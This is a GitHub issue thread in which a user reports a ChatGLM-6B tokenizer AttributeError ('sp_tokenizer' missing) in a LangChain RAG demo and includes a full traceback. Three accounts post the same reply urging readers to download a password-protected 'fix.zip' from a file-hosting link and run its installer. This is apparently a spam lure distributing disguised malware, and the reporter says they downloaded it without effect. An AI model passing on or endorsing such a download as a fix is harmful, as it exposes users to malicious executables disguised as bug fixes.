### ISSUE TITLE
bug

### ISSUE THREAD

**Issue by xiaobai-marker** [0325Kai-Huang/LangChain_ChatGLM_NNU_RAG#1]
完全按照需求文件配置环境也会保存
加载数据库
加载自定义LLM
正在从本地加载模型...
Traceback (most recent call last):
  File "J:\知识库问答助手\LangChain_ChatGLM_NNU_RAG-main\nnu_chat_rag_web_demo.py", line 72, in <module>
    model_center = Model_center()
                   ^^^^^^^^^^^^^^
  File "J:\知识库问答助手\LangChain_ChatGLM_NNU_RAG-main\nnu_chat_rag_web_demo.py", line 51, in __init__
    self.chain = load_chain()
                 ^^^^^^^^^^^^
  File "J:\知识库问答助手\LangChain_ChatGLM_NNU_RAG-main\nnu_chat_rag_web_demo.py", line 26, in load_chain
    llm = ChatGLM_LLM(model_path="J:/知识库问答助手/ZhipuAI/ChatGLM-6B")
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "J:\知识库问答助手\LangChain_ChatGLM_NNU_RAG-main\LLM.py", line 18, in __init__
    self.tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\Anaconda3\envs\llm\Lib\site-packages\transformers\models\auto\tokenization_auto.py", line 865, in from_pretrained
    return tokenizer_class.from_pretrained(
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\Anaconda3\envs\llm\Lib\site-packages\transformers\tokenization_utils_base.py", line 2110, in from_pretrained
    return cls._from_pretrained(
           ^^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\Anaconda3\envs\llm\Lib\site-packages\transformers\tokenization_utils_base.py", line 2336, in _from_pretrained
    tokenizer = cls(*init_inputs, **init_kwargs)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xiaobai\.cache\huggingface\modules\transformers_modules\ChatGLM-6B\tokenization_chatglm.py", line 196, in __init__
    super().__init__(
  File "C:\ProgramData\Anaconda3\envs\llm\Lib\site-packages\transformers\tokenization_utils.py", line 367, in __init__
    self._add_tokens(
  File "C:\ProgramData\Anaconda3\envs\llm\Lib\site-packages\transformers\tokenization_utils.py", line 467, in _add_tokens
    current_vocab = self.get_vocab().copy()
                    ^^^^^^^^^^^^^^^^
  File "C:\Users\xiaobai\.cache\huggingface\modules\transformers_modules\ChatGLM-6B\tokenization_chatglm.py", line 248, in get_vocab
    vocab = {self._convert_id_to_token(i): i for i in range(self.vocab_size)}
                                                            ^^^^^^^^^^^^^^^
  File "C:\Users\xiaobai\.cache\huggingface\modules\transformers_modules\ChatGLM-6B\tokenization_chatglm.py", line 244, in vocab_size
    return self.sp_tokenizer.num_tokens
           ^^^^^^^^^^^^^^^^^
AttributeError: 'ChatGLMTokenizer' object has no attribute 'sp_tokenizer'. Did you mean: '_tokenize'?

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
从提供文件夹下载了x86_64-w64-ranlib.exe 但还是不能解决此问题

**Comment by xiaobai-marker** [comment]
经过测试ChatGLM-6B示例代码，模型没有问题
